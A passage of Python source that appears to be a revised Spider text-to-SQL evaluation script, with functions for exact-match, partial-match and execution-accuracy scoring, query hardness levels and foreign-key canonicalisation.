        """Mapping from lowercased 'table' / 'table.column' to '__...__' ids."""
        return self._idMap

    def _map(self, schema):
        # Bug fix: dict.iteritems() is Python 2 only and raises AttributeError
        # on Python 3 — use items(). Also dropped the unused 'id' counter that
        # shadowed the builtin.
        idMap = {'*': "__all__"}
        for key, vals in schema.items():
            for val in vals:
                idMap[key.lower() + "." + val.lower()] = "__" + \
                    key.lower() + "." + val.lower() + "__"
        for key in schema:
            idMap[key.lower()] = "__" + key.lower() + "__"
        return idMap
def condition_has_or(conds):
    """True when any and/or connector (odd indexes) in *conds* is 'or'."""
    connectors = conds[1::2]
    return 'or' in connectors
def condition_has_like(conds):
    """True when any condition unit in *conds* uses the 'like' operator."""
    like_op = WHERE_OPS.index('like')
    return like_op in [cond_unit[1] for cond_unit in conds[::2]]
def condition_has_sql(conds):
    """True when any condition unit compares against a nested SQL dict."""
    for cond_unit in conds[::2]:
        for val in (cond_unit[3], cond_unit[4]):
            if val is not None and type(val) is dict:
                return True
    return False
def val_has_op(val_unit):
    """True when the value unit applies an arithmetic unit operation."""
    none_op = UNIT_OPS.index('none')
    return val_unit[0] != none_op
def has_agg(unit):
    """True when the unit carries an aggregation function (agg id != 'none')."""
    no_agg = AGG_OPS.index('none')
    return unit[0] != no_agg
def accuracy(count, total):
    """All-or-nothing accuracy: 1 only when every item matched."""
    return 1 if count == total else 0
def recall(count, total):
    """All-or-nothing recall: 1 only when every item matched."""
    return 1 if count == total else 0
def F1(acc, rec):
    """Harmonic mean of accuracy and recall; 0 when both are 0."""
    denom = acc + rec
    if denom == 0:
        return 0
    return (2. * acc * rec) / denom
def get_scores(count, pred_total, label_total):
    """Exact-set (acc, rec, f1): all ones only when prediction and gold agree completely."""
    if pred_total == label_total == count:
        return 1, 1, 1
    return 0, 0, 0
def eval_sel(pred, label):
    """Compare SELECT clauses.

    Returns (label_total, pred_total, matched, matched_ignoring_agg); each gold
    unit can be consumed by at most one predicted unit.
    """
    pred_sel = pred['select'][1]
    remaining = list(label['select'][1])
    remaining_wo_agg = [unit[1] for unit in remaining]
    pred_total, label_total = len(pred_sel), len(remaining)
    cnt = 0
    cnt_wo_agg = 0
    for unit in pred_sel:
        if unit in remaining:
            cnt += 1
            remaining.remove(unit)
        if unit[1] in remaining_wo_agg:
            cnt_wo_agg += 1
            remaining_wo_agg.remove(unit[1])
    return label_total, pred_total, cnt, cnt_wo_agg
def eval_where(pred, label):
    """Compare WHERE condition units.

    Returns (label_total, pred_total, matched, matched_ignoring_operators).
    """
    pred_conds = list(pred['where'][::2])
    remaining = list(label['where'][::2])
    remaining_wo_agg = [unit[2] for unit in remaining]
    pred_total, label_total = len(pred_conds), len(remaining)
    cnt = 0
    cnt_wo_agg = 0
    for unit in pred_conds:
        if unit in remaining:
            cnt += 1
            remaining.remove(unit)
        if unit[2] in remaining_wo_agg:
            cnt_wo_agg += 1
            remaining_wo_agg.remove(unit[2])
    return label_total, pred_total, cnt, cnt_wo_agg
def eval_group(pred, label):
    """Compare GROUP BY columns (HAVING ignored); returns (label_total, pred_total, matched)."""
    pred_cols = [unit[1] for unit in pred['groupBy']]
    remaining = [unit[1] for unit in label['groupBy']]
    pred_total, label_total = len(pred_cols), len(remaining)
    cnt = 0
    for col in pred_cols:
        if col in remaining:
            cnt += 1
            remaining.remove(col)
    return label_total, pred_total, cnt
def eval_having(pred, label):
    """Compare HAVING together with its GROUP BY; returns (label_total, pred_total, matched)."""
    pred_total = 1 if len(pred['groupBy']) > 0 else 0
    label_total = 1 if len(label['groupBy']) > 0 else 0
    cnt = 0
    pred_cols = [unit[1] for unit in pred['groupBy']]
    label_cols = [unit[1] for unit in label['groupBy']]
    full_match = (pred_total == label_total == 1
                  and pred_cols == label_cols
                  and pred['having'] == label['having'])
    if full_match:
        cnt = 1
    return label_total, pred_total, cnt
def eval_order(pred, label):
    """Compare ORDER BY together with LIMIT presence; returns (label_total, pred_total, matched)."""
    pred_total = 1 if len(pred['orderBy']) > 0 else 0
    label_total = 1 if len(label['orderBy']) > 0 else 0
    cnt = 0
    # only the presence of LIMIT matters, not its value
    limits_agree = (pred['limit'] is None) == (label['limit'] is None)
    if len(label['orderBy']) > 0 and pred['orderBy'] == label['orderBy'] and limits_agree:
        cnt = 1
    return label_total, pred_total, cnt
def eval_and_or(pred, label):
    """Compare the sets of and/or connectors used in the WHERE clauses.

    Note the return order here is (pred_total, label_total, matched) on the
    mismatch path, unlike the other eval_* helpers.
    """
    pred_ao = set(pred['where'][1::2])
    label_ao = set(label['where'][1::2])
    if pred_ao == label_ao:
        return 1, 1, 1
    return len(pred_ao), len(label_ao), 0
def get_nestedSQL(sql):
    """Collect every nested sub-SQL dict: condition values and IUE clauses."""
    nested = []
    all_conds = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]
    for cond_unit in all_conds:
        for val in (cond_unit[3], cond_unit[4]):
            if type(val) is dict:
                nested.append(val)
    for clause in ('intersect', 'except', 'union'):
        if sql[clause] is not None:
            nested.append(sql[clause])
    return nested
def eval_nested(pred, label):
    """Score one nested-SQL pair; exact match is computed only when both sides exist."""
    pred_total = 0 if pred is None else 1
    label_total = 0 if label is None else 1
    cnt = 0
    if pred is not None and label is not None:
        cnt += SpiderEvaluator().eval_exact_match(pred, label)
    return label_total, pred_total, cnt
def eval_IUEN(pred, label):
    """Aggregate nested-SQL scores over the INTERSECT / EXCEPT / UNION clauses."""
    label_total = 0
    pred_total = 0
    cnt = 0
    for clause in ('intersect', 'except', 'union'):
        lt, pt, c = eval_nested(pred[clause], label[clause])
        label_total += lt
        pred_total += pt
        cnt += c
    return label_total, pred_total, cnt
def get_keywords(sql):
    """Collect the set of SQL keywords that appear in the parsed query."""
    res = set()
    if len(sql['where']) > 0:
        res.add('where')
    if len(sql['groupBy']) > 0:
        res.add('group')
    if len(sql['having']) > 0:
        res.add('having')
    if len(sql['orderBy']) > 0:
        # record the sort direction alongside 'order'
        res.add(sql['orderBy'][0])
        res.add('order')
    if sql['limit'] is not None:
        res.add('limit')
    for clause in ('except', 'union', 'intersect'):
        if sql[clause] is not None:
            res.add(clause)
    # 'or' connector anywhere between conditions
    ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]
    if any(token == 'or' for token in ao):
        res.add('or')
    cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]
    # negated conditions
    if any(cond_unit[0] for cond_unit in cond_units):
        res.add('not')
    # 'in' and 'like' operators
    if any(cond_unit[1] == WHERE_OPS.index('in') for cond_unit in cond_units):
        res.add('in')
    if any(cond_unit[1] == WHERE_OPS.index('like') for cond_unit in cond_units):
        res.add('like')
    return res
def eval_keywords(pred, label):
    """Compare keyword sets; returns (label_total, pred_total, overlap)."""
    pred_keywords = get_keywords(pred)
    label_keywords = get_keywords(label)
    overlap = len(pred_keywords & label_keywords)
    return len(label_keywords), len(pred_keywords), overlap
def count_agg(units):
    """Number of units carrying an aggregation function."""
    return sum(1 for unit in units if has_agg(unit))
def count_component1(sql):
    """Count 'component 1' features (where/group/order/limit/join/or/like) for hardness scoring."""
    count = 0
    for clause in ('where', 'groupBy', 'orderBy'):
        if len(sql[clause]) > 0:
            count += 1
    if sql['limit'] is not None:
        count += 1
    # every extra table in FROM counts as one JOIN
    if len(sql['from']['table_units']) > 0:
        count += len(sql['from']['table_units']) - 1
    ao = sql['from']['conds'][1::2] + sql['where'][1::2] + sql['having'][1::2]
    count += sum(1 for token in ao if token == 'or')
    cond_units = sql['from']['conds'][::2] + sql['where'][::2] + sql['having'][::2]
    count += sum(1 for cond_unit in cond_units if cond_unit[1] == WHERE_OPS.index('like'))
    return count
def count_component2(sql):
    """Count nested sub-queries ('component 2' hardness features)."""
    return len(get_nestedSQL(sql))
def count_others(sql):
    """Count 'other' complexity features: multiple aggs / columns / conditions / group keys."""
    count = 0
    # aggregations across select, where, group by, order by and having
    agg_count = count_agg(sql['select'][1])
    agg_count += count_agg(sql['where'][::2])
    agg_count += count_agg(sql['groupBy'])
    if len(sql['orderBy']) > 0:
        order_units = sql['orderBy'][1]
        agg_count += count_agg([unit[1] for unit in order_units if unit[1]]
                               + [unit[2] for unit in order_units if unit[2]])
    agg_count += count_agg(sql['having'])
    if agg_count > 1:
        count += 1
    # more than one selected column / where condition / group-by key
    for size in (len(sql['select'][1]), len(sql['where']), len(sql['groupBy'])):
        if size > 1:
            count += 1
    return count
class SpiderEvaluator:
    """A simple evaluator"""

    def __init__(self):
        # Partial-match scores of the most recent eval_exact_match call.
        self.partial_scores = None

    def eval_hardness(self, sql):
        """Classify a parsed SQL query as easy / medium / hard / extra."""
        count_comp1_ = count_component1(sql)
        count_comp2_ = count_component2(sql)
        count_others_ = count_others(sql)
        if count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ == 0:
            return "easy"
        elif (count_others_ <= 2 and count_comp1_ <= 1 and count_comp2_ == 0) or \
                (count_comp1_ <= 2 and count_others_ < 2 and count_comp2_ == 0):
            return "medium"
        elif (count_others_ > 2 and count_comp1_ <= 2 and count_comp2_ == 0) or \
                (2 < count_comp1_ <= 3 and count_others_ <= 2 and count_comp2_ == 0) or \
                (count_comp1_ <= 1 and count_others_ == 0 and count_comp2_ <= 1):
            return "hard"
        else:
            return "extra"

    def eval_exact_match(self, pred, label):
        """Return truthy (1/True) when every partial component has f1 == 1 and,
        when the gold query uses tables, the FROM table sets also agree.
        Side effect: stores the per-component scores in self.partial_scores.
        """
        partial_scores = self.eval_partial_match(pred, label)
        self.partial_scores = partial_scores
        for x, score in partial_scores.items():
            if score['f1'] != 1:
                return 0
        if len(label['from']['table_units']) > 0:
            label_tables = sorted(label['from']['table_units'])
            pred_tables = sorted(pred['from']['table_units'])
            # NOTE(review): returns a bool here but an int elsewhere — callers
            # appear to treat both as 0/1.
            return label_tables == pred_tables
        return 1

    def eval_partial_match(self, pred, label):
        """Score each SQL component separately.

        Returns a dict keyed by component name; each entry holds acc/rec/f1
        plus the prediction and gold totals for that component.
        """
        res = {}
        label_total, pred_total, cnt, cnt_wo_agg = eval_sel(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['select'] = {'acc': acc, 'rec': rec, 'f1': f1,
                         'label_total': label_total, 'pred_total': pred_total}
        acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)
        res['select(no AGG)'] = {'acc': acc, 'rec': rec, 'f1': f1,
                                 'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt, cnt_wo_agg = eval_where(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['where'] = {'acc': acc, 'rec': rec, 'f1': f1,
                        'label_total': label_total, 'pred_total': pred_total}
        acc, rec, f1 = get_scores(cnt_wo_agg, pred_total, label_total)
        res['where(no OP)'] = {'acc': acc, 'rec': rec, 'f1': f1,
                               'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt = eval_group(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['group(no Having)'] = {'acc': acc, 'rec': rec, 'f1': f1, 'label_total': label_total,
                                   'pred_total': pred_total}
        label_total, pred_total, cnt = eval_having(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['group'] = {'acc': acc, 'rec': rec, 'f1': f1,
                        'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt = eval_order(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['order'] = {'acc': acc, 'rec': rec, 'f1': f1,
                        'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt = eval_and_or(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['and/or'] = {'acc': acc, 'rec': rec, 'f1': f1,
                         'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt = eval_IUEN(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['IUEN'] = {'acc': acc, 'rec': rec, 'f1': f1,
                       'label_total': label_total, 'pred_total': pred_total}
        label_total, pred_total, cnt = eval_keywords(pred, label)
        acc, rec, f1 = get_scores(cnt, pred_total, label_total)
        res['keywords'] = {'acc': acc, 'rec': rec, 'f1': f1,
                           'label_total': label_total, 'pred_total': pred_total}
        return res
def isValidSQL(sql, db):
    """Return True when *sql* executes successfully against the sqlite database at *db*.

    :param sql: SQL text to check
    :param db: path to a sqlite database file
    """
    conn = sqlite3.connect(db)
    try:
        conn.cursor().execute(sql)
    except Exception:
        return False
    finally:
        # Bug fix: the original leaked the connection on every call.
        conn.close()
    return True
def print_scores(scores, etype, p_func=print):
    """Print the evaluation score tables.

    :param scores: per-level score dict produced by evaluate()
    :param etype: "all", "exec" or "match" — selects which tables to print
    :param p_func: output callable, defaults to print (allows logging instead)
    """
    levels = ['easy', 'medium', 'hard', 'extra', 'all']
    partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
                     'group', 'order', 'and/or', 'IUEN', 'keywords']
    p_func("{:20} {:20} {:20} {:20} {:20} {:20}".format("", *levels))
    counts = [scores[level]['count'] for level in levels]
    p_func("{:20} {:<20d} {:<20d} {:<20d} {:<20d} {:<20d}".format("count", *counts))
    if etype in ["all", "exec"]:
        p_func('===================== EXECUTION ACCURACY =====================')
        this_scores = [scores[level]['exec'] for level in levels]
        p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
            "execution", *this_scores))
    if etype in ["all", "match"]:
        p_func('\n====================== EXACT MATCHING ACCURACY =====================')
        exact_scores = [scores[level]['exact'] for level in levels]
        p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
            "exact match", *exact_scores))
        # optional alternative exact-match metric, present only when computed upstream
        if 'exact_alan' in scores['all']:
            exact_scores_alan = [scores[level]['exact_alan'] for level in levels]
            p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(
                "Alan exact match", *exact_scores_alan))
        p_func('\n---------------------PARTIAL MATCHING ACCURACY----------------------')
        for type_ in partial_types:
            this_scores = [scores[level]['partial'][type_]['acc'] for level in levels]
            p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
        p_func('---------------------- PARTIAL MATCHING RECALL ----------------------')
        for type_ in partial_types:
            this_scores = [scores[level]['partial'][type_]['rec'] for level in levels]
            p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
        p_func('---------------------- PARTIAL MATCHING F1 --------------------------')
        for type_ in partial_types:
            this_scores = [scores[level]['partial'][type_]['f1'] for level in levels]
            p_func("{:20} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f} {:<20.3f}".format(type_, *this_scores))
def evaluate(gold, predict, db_dir, etype, kmaps):
    """Score predicted SQL against gold SQL, aggregated per hardness level.

    :param gold: path to a file of "gold_sql<TAB>db_id" lines
    :param predict: path to a file of predicted SQL, one per line
    :param db_dir: directory containing <db_id>/<db_id>.sqlite databases
    :param etype: "all", "exec" (execution accuracy) and/or "match" (exact match)
    :param kmaps: per-database foreign-key maps (see build_foreign_key_map_from_json)
    """
    with open(gold) as f:
        glist = [l.strip().split('\t') for l in f.readlines() if len(l.strip()) > 0]
    with open(predict) as f:
        plist = [l.strip().split('\t') for l in f.readlines() if len(l.strip()) > 0]
    evaluator = SpiderEvaluator()
    levels = ['easy', 'medium', 'hard', 'extra', 'all']
    partial_types = ['select', 'select(no AGG)', 'where', 'where(no OP)', 'group(no Having)',
                     'group', 'order', 'and/or', 'IUEN', 'keywords']
    entries = []
    scores = {}
    for level in levels:
        scores[level] = {'count': 0, 'partial': {}, 'exact': 0.}
        scores[level]['exec'] = 0
        for type_ in partial_types:
            scores[level]['partial'][type_] = {'acc': 0.,
                                               'rec': 0., 'f1': 0., 'acc_count': 0, 'rec_count': 0}
    eval_err_num = 0
    for p, g in zip(plist, glist):
        p_str = p[0]
        g_str, db = g
        db_name = db
        db = os.path.join(db_dir, db, db + ".sqlite")
        schema = Schema(get_schema(db))
        g_sql = get_sql(schema, g_str)
        hardness = evaluator.eval_hardness(g_sql)
        scores[hardness]['count'] += 1
        scores['all']['count'] += 1
        try:
            p_sql = get_sql(schema, p_str)
        except Exception:
            # If p_sql is not valid, then we will use an empty sql to evaluate with the correct sql
            p_sql = {
                "except": None,
                "from": {
                    "conds": [],
                    "table_units": []
                },
                "groupBy": [],
                "having": [],
                "intersect": None,
                "limit": None,
                "orderBy": [],
                "select": [
                    False,
                    []
                ],
                "union": None,
                "where": []
            }
            eval_err_num += 1
            print("eval_err_num:{}".format(eval_err_num))
        # rebuild sql for value evaluation
        kmap = kmaps[db_name]
        g_valid_col_units = build_valid_col_units(g_sql['from']['table_units'], schema)
        g_sql = rebuild_sql_val(g_sql)
        g_sql = rebuild_sql_col(g_valid_col_units, g_sql, kmap)
        p_valid_col_units = build_valid_col_units(p_sql['from']['table_units'], schema)
        p_sql = rebuild_sql_val(p_sql)
        p_sql = rebuild_sql_col(p_valid_col_units, p_sql, kmap)
        if etype in ["all", "exec"]:
            exec_score = eval_exec_match(db, p_str, g_str, p_sql, g_sql)
            if exec_score:
                scores[hardness]['exec'] += 1
        if etype in ["all", "match"]:
            exact_score = evaluator.eval_exact_match(p_sql, g_sql)
            partial_scores = evaluator.partial_scores
            if exact_score == 0:
                print("{} pred: {}".format(hardness, p_str))
                print("{} gold: {}".format(hardness, g_str))
                print("")
            scores[hardness]['exact'] += exact_score
            scores['all']['exact'] += exact_score
            for type_ in partial_types:
                if partial_scores[type_]['pred_total'] > 0:
                    scores[hardness]['partial'][type_]['acc'] += partial_scores[type_]['acc']
                    scores[hardness]['partial'][type_]['acc_count'] += 1
                if partial_scores[type_]['label_total'] > 0:
                    scores[hardness]['partial'][type_]['rec'] += partial_scores[type_]['rec']
                    scores[hardness]['partial'][type_]['rec_count'] += 1
                scores[hardness]['partial'][type_]['f1'] += partial_scores[type_]['f1']
                if partial_scores[type_]['pred_total'] > 0:
                    scores['all']['partial'][type_]['acc'] += partial_scores[type_]['acc']
                    scores['all']['partial'][type_]['acc_count'] += 1
                if partial_scores[type_]['label_total'] > 0:
                    scores['all']['partial'][type_]['rec'] += partial_scores[type_]['rec']
                    scores['all']['partial'][type_]['rec_count'] += 1
                scores['all']['partial'][type_]['f1'] += partial_scores[type_]['f1']
            # NOTE(review): upstream Spider keeps this append at loop level,
            # where exact_score / partial_scores are unbound under etype=='exec'
            # (NameError); it is nested here under the match branch — confirm.
            entries.append({
                'predictSQL': p_str,
                'goldSQL': g_str,
                'hardness': hardness,
                'exact': exact_score,
                'partial': partial_scores
            })
    # normalize the accumulated sums into averages per level
    for level in levels:
        if scores[level]['count'] == 0:
            continue
        if etype in ["all", "exec"]:
            scores[level]['exec'] /= scores[level]['count']
        if etype in ["all", "match"]:
            scores[level]['exact'] /= scores[level]['count']
            for type_ in partial_types:
                if scores[level]['partial'][type_]['acc_count'] == 0:
                    scores[level]['partial'][type_]['acc'] = 0
                else:
                    scores[level]['partial'][type_]['acc'] = scores[level]['partial'][type_]['acc'] / \
                        scores[level]['partial'][type_]['acc_count'] * 1.0
                if scores[level]['partial'][type_]['rec_count'] == 0:
                    scores[level]['partial'][type_]['rec'] = 0
                else:
                    scores[level]['partial'][type_]['rec'] = scores[level]['partial'][type_]['rec'] / \
                        scores[level]['partial'][type_]['rec_count'] * 1.0
                # NOTE(review): f1 is forced to 1 when both acc and rec are 0 —
                # this mirrors the upstream Spider script; confirm intended.
                if scores[level]['partial'][type_]['acc'] == 0 and scores[level]['partial'][type_]['rec'] == 0:
                    scores[level]['partial'][type_]['f1'] = 1
                else:
                    scores[level]['partial'][type_]['f1'] = \
                        2.0 * scores[level]['partial'][type_]['acc'] * scores[level]['partial'][type_]['rec'] / (
                            scores[level]['partial'][type_]['rec'] + scores[level]['partial'][type_]['acc'])
    print_scores(scores, etype)
def eval_exec_match(db, p_str, g_str, pred, gold):
    """
    return 1 if the values between prediction and gold are matching
    in the corresponding index. Currently not support multiple col_unit(pairs).
    """
    conn = sqlite3.connect(db)
    cursor = conn.cursor()
    try:
        try:
            cursor.execute(p_str)
            p_res = cursor.fetchall()
        except Exception:
            # a prediction that fails to execute scores 0
            return False
        cursor.execute(g_str)
        q_res = cursor.fetchall()
    finally:
        # Bug fix: the original never closed the connection (leaked one per call).
        conn.close()

    def res_map(res, val_units):
        # Map each selected value unit to the column of values it produced, so
        # comparison is column-order independent.
        rmap = {}
        for idx, val_unit in enumerate(val_units):
            key = tuple(val_unit[1]) if not val_unit[2] else (
                val_unit[0], tuple(val_unit[1]), tuple(val_unit[2]))
            rmap[key] = [r[idx] for r in res]
        return rmap

    p_val_units = [unit[1] for unit in pred['select'][1]]
    q_val_units = [unit[1] for unit in gold['select'][1]]
    return res_map(p_res, p_val_units) == res_map(q_res, q_val_units)
# Rebuild SQL functions for value evaluation
def rebuild_cond_unit_val(cond_unit):
    """Strip literal comparison values from a condition unit; nested SQL is rebuilt recursively."""
    if cond_unit is None or not DISABLE_VALUE:
        return cond_unit
    not_op, op_id, val_unit, val1, val2 = cond_unit
    val1 = rebuild_sql_val(val1) if type(val1) is dict else None
    val2 = rebuild_sql_val(val2) if type(val2) is dict else None
    return not_op, op_id, val_unit, val1, val2
def rebuild_condition_val(condition):
    """Apply rebuild_cond_unit_val to every condition unit (even indexes) of a condition list."""
    if condition is None or not DISABLE_VALUE:
        return condition
    return [rebuild_cond_unit_val(item) if idx % 2 == 0 else item
            for idx, item in enumerate(condition)]
def rebuild_sql_val(sql):
    """Recursively strip literal values from a parsed SQL dict (mutates in place)."""
    if sql is None or not DISABLE_VALUE:
        return sql
    sql['from']['conds'] = rebuild_condition_val(sql['from']['conds'])
    sql['having'] = rebuild_condition_val(sql['having'])
    sql['where'] = rebuild_condition_val(sql['where'])
    for tab_unit in sql['from']['table_units']:
        # NOTE: rebinding the loop variable does not write back into the list;
        # only the in-place mutation of the nested dict takes effect (as in
        # the original).
        if tab_unit[0] == 'sql':
            tab_unit = ('sql', rebuild_sql_val(tab_unit[1]))
    for clause in ('intersect', 'except', 'union'):
        sql[clause] = rebuild_sql_val(sql[clause])
    return sql
# Rebuild SQL functions for foreign key evaluation
def build_valid_col_units(table_units, schema):
    """Collect the column units considered valid given the tables used in FROM.

    NOTE(review): `col_names[value][0]` indexes column_names_original with an
    idMap *value*; with the Schema class defined above those values are
    strings, which would fail — presumably `schema` here is a different schema
    object whose idMap values are integer column ids. Confirm against
    get_schema's return type.
    """
    col_names = schema._table['column_names_original']
    tab_ids = [table_unit[1]
               for table_unit in table_units if table_unit[0] == TABLE_TYPE['table_unit']]
    valid_col_units = []
    for value in schema.idMap.values():
        # keep columns whose owning table appears in the FROM clause
        if col_names[value][0] in tab_ids:
            valid_col_units.append(value)
    return valid_col_units
def rebuild_col_unit_col(valid_col_units, col_unit, kmap):
    """Canonicalize a column unit via the foreign-key map; DISTINCT is dropped when disabled."""
    if col_unit is None:
        return col_unit
    agg_id, col_id, distinct = col_unit
    remappable = col_id in kmap and col_id in valid_col_units
    new_col = kmap[col_id] if remappable else col_id
    new_distinct = None if DISABLE_DISTINCT else distinct
    return agg_id, new_col, new_distinct
def rebuild_val_unit_col(valid_col_units, val_unit, kmap):
    """Canonicalize both column units inside a value unit."""
    if val_unit is None:
        return val_unit
    unit_op, left, right = val_unit
    left = rebuild_col_unit_col(valid_col_units, left, kmap)
    right = rebuild_col_unit_col(valid_col_units, right, kmap)
    return unit_op, left, right
def rebuild_table_unit_col(valid_col_units, table_unit, kmap):
    """Canonicalize a FROM-clause table unit when its payload is a column-unit tuple."""
    if table_unit is None:
        return table_unit
    table_type, payload = table_unit
    if isinstance(payload, tuple):
        payload = rebuild_col_unit_col(valid_col_units, payload, kmap)
    return table_type, payload
def rebuild_cond_unit_col(valid_col_units, cond_unit, kmap):
    """Canonicalize the value unit and any nested SQL inside a condition unit."""
    if cond_unit is None:
        return cond_unit
    not_op, op_id, val_unit, lhs, rhs = cond_unit
    rebuilt_val = rebuild_val_unit_col(valid_col_units, val_unit, kmap)
    rebuilt_lhs = rebuild_sql_col(valid_col_units, lhs, kmap) if isinstance(lhs, dict) else lhs
    rebuilt_rhs = rebuild_sql_col(valid_col_units, rhs, kmap) if isinstance(rhs, dict) else rhs
    return not_op, op_id, rebuilt_val, rebuilt_lhs, rebuilt_rhs
def rebuild_condition_col(valid_col_units, condition, kmap):
    """Canonicalize every condition unit (even indexes) of a condition list, in place."""
    for idx, item in enumerate(condition):
        if idx % 2 == 0:
            condition[idx] = rebuild_cond_unit_col(valid_col_units, item, kmap)
    return condition
def rebuild_select_col(valid_col_units, sel, kmap):
    """Canonicalize every (agg, val_unit) pair of a SELECT clause."""
    if sel is None:
        return sel
    distinct, items = sel
    rebuilt = [(agg_id, rebuild_val_unit_col(valid_col_units, val_unit, kmap))
               for agg_id, val_unit in items]
    if DISABLE_DISTINCT:
        distinct = None
    return distinct, rebuilt
def rebuild_from_col(valid_col_units, from_, kmap):
    """Canonicalize the table units and join conditions of a FROM clause, in place."""
    if from_ is None:
        return from_
    from_['table_units'] = [
        rebuild_table_unit_col(valid_col_units, tu, kmap) for tu in from_['table_units']
    ]
    from_['conds'] = rebuild_condition_col(valid_col_units, from_['conds'], kmap)
    return from_
def rebuild_group_by_col(valid_col_units, group_by, kmap):
    """Canonicalize every GROUP BY column unit."""
    if group_by is None:
        return group_by
    return [rebuild_col_unit_col(valid_col_units, cu, kmap) for cu in group_by]
def rebuild_order_by_col(valid_col_units, order_by, kmap):
    """Canonicalize every ORDER BY value unit, keeping the sort direction."""
    if order_by is None or len(order_by) == 0:
        return order_by
    direction, val_units = order_by
    rebuilt = [rebuild_val_unit_col(valid_col_units, vu, kmap) for vu in val_units]
    return direction, rebuilt
def rebuild_sql_col(valid_col_units, sql, kmap):
    """Canonicalize every clause of a parsed SQL dict through the foreign-key map, in place."""
    if sql is None:
        return sql
    sql['select'] = rebuild_select_col(valid_col_units, sql['select'], kmap)
    sql['from'] = rebuild_from_col(valid_col_units, sql['from'], kmap)
    sql['where'] = rebuild_condition_col(valid_col_units, sql['where'], kmap)
    sql['groupBy'] = rebuild_group_by_col(valid_col_units, sql['groupBy'], kmap)
    sql['orderBy'] = rebuild_order_by_col(valid_col_units, sql['orderBy'], kmap)
    sql['having'] = rebuild_condition_col(valid_col_units, sql['having'], kmap)
    for clause in ('intersect', 'except', 'union'):
        sql[clause] = rebuild_sql_col(valid_col_units, sql[clause], kmap)
    return sql
def build_foreign_key_map(entry):
    """Map each column id in a foreign-key group to the smallest id of its group.

    Groups are grown greedily over ``entry["foreign_keys"]`` in order: a key
    pair joins the first existing group containing either key, otherwise it
    starts a new group (this mirrors the official Spider evaluation script).
    """
    cols_orig = entry["column_names_original"]
    # Identity mapping mirroring the idmap that Schema builds.
    cols = list(range(len(cols_orig)))

    def _group_for(k1, k2, groups):
        # Return the first existing group containing either key, else a fresh one.
        for group in groups:
            if k1 in group or k2 in group:
                return group
        fresh = set()
        groups.append(fresh)
        return fresh

    key_groups = []
    for key1, key2 in entry["foreign_keys"]:
        group = _group_for(key1, key2, key_groups)
        group.add(key1)
        group.add(key2)

    fk_map = {}
    for group in key_groups:
        members = sorted(group)
        anchor = members[0]
        for member in members:
            fk_map[cols[member]] = cols[anchor]
    return fk_map
def build_foreign_key_map_from_json(table):
    """Load a Spider ``tables.json`` file and build one foreign-key map per db.

    Returns ``{db_id: foreign_key_map}``.
    """
    with open(table) as handle:
        entries = json.load(handle)
    return {entry['db_id']: build_foreign_key_map(entry) for entry in entries}
def is_col_valid(col_unit, in_where=False):
    """Validity check for one col_unit ``(agg_id, col_id, ...)``.

    A missing col_unit is trivially valid; the bare '*' column (agg 0,
    col 0) never is; inside a WHERE clause any aggregated column is
    rejected as well.
    """
    if col_unit is None:
        return True
    agg_id, col_id = col_unit[0], col_unit[1]
    if agg_id == 0 and col_id == 0:
        return False
    return not (in_where and agg_id != 0)
def is_query_valid(_sql, schema):
    """Heuristic structural validity check for one Spider query block.

    ``_sql`` is a Spider-style parse dict and ``schema`` wraps the database
    description (``schema._table``).  Returns False on duplicate SELECT
    items, join conditions over unknown tables, FROM/JOIN table mismatches,
    or invalid columns in WHERE / HAVING / GROUP BY / ORDER BY.  Nested
    sub-queries used as comparison values are checked recursively through
    ``is_sql_valid``.
    """
    select_body = _sql['select'][1]
    # Reject duplicated (agg_id, val_unit) entries in the SELECT list.
    if len(select_body) != len(set(select_body)):
        return False
    # from-conds alternate cond_unit / 'and' separators; [::2] keeps cond_units.
    conds = _sql['from']['conds'][::2]
    tab_in_conds = set()
    for cond in conds:
        # cond = (not_op, op_id, val_unit, val1, val2); the left column id is
        # taken from val_unit's first col_unit, the right from val1 -- this
        # assumes join conditions compare two plain columns (TODO confirm).
        tab1 = schema._table['column_names_original'][cond[2][1][1]][0]
        tab2 = schema._table['column_names_original'][cond[3][1]][0]
        if tab1 == -1 or tab2 == -1:
            # Table id -1 belongs to the synthetic '*' column: not joinable.
            return False
        tab_in_conds.add(tab1)
        tab_in_conds.add(tab2)
    table_units = _sql['from']['table_units']
    tab_in_from = set()
    for tab in table_units:
        if isinstance(tab[1], int):
            tab_in_from.add(tab[1])
    # A multi-table FROM must be exactly covered by its join conditions.
    if len(tab_in_from) > 1 and tab_in_conds != tab_in_from:
        return False
    # A single-table FROM must not carry join conditions.
    if len(table_units) == 1 and len(conds) > 0:
        return False
    where_conds = _sql['where'][::2]
    having_conds = _sql['having'][::2]
    for cond in where_conds:
        # Recurse into sub-queries used as comparison values.
        if isinstance(cond[3], dict) and not is_sql_valid(cond[3], schema):
            return False
